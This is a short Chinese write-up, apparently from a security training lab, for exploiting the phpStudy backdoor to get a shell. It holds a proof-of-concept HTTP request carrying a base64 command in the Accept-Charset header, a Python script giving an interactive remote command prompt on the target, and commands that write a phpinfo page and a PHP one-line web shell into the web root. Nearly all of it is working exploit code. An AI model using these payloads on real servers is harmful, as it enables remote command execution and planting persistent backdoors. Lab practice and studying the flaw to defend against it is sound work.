猫舍 phpstudy getshell

phpstudy backdoor RCE

poc：

GET /?id=1 HTTP/1.1
Host: rhiq8003.ia.aqlab.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://rhiq8003.ia.aqlab.cn/
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

exp:

# jussi
import base64
import requests
import re

print("\n========== Phpstudy Backdoor Exploit ============\n")

def os_shell(url,headers,payload):
    try:
        r = requests.get(url = url, headers = headers, verify = False, timeout = 20)
        res = re.findall("flag(.*?)flag", r.text, re.S)
        res = "".join(res)
        print(res)
    except:
        print("[ - ]=========== Failed! Timeout... ==========[ - ]\n")

def main():
    url = "http://rhiq8003.ia.aqlab.cn/"
    while True:
        cmd = input("> ")
        payload = "echo \"flag\";system(\"" + cmd + "\");echo \"flag\";"
        payload = base64.b64encode(payload.encode('utf-8'))
        payload = str(payload, 'utf-8')
        headers = {
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'accept-charset': payload,
            'Accept-Encoding': 'gzip,deflate',
            'Connection': 'close',
        }
        os_shell(url=url, headers=headers, payload=payload)

if __name__ == '__main__':
    main()

写入 phpinfo()

echo \"<?php phpinfo();?>\" > ..\WWW\qazwsx.php

写入 一句话木马

echo \"<?php eval(@\$_POST['zkaqzkaq']);?>\" > ..\WWW\qazwsxedc.php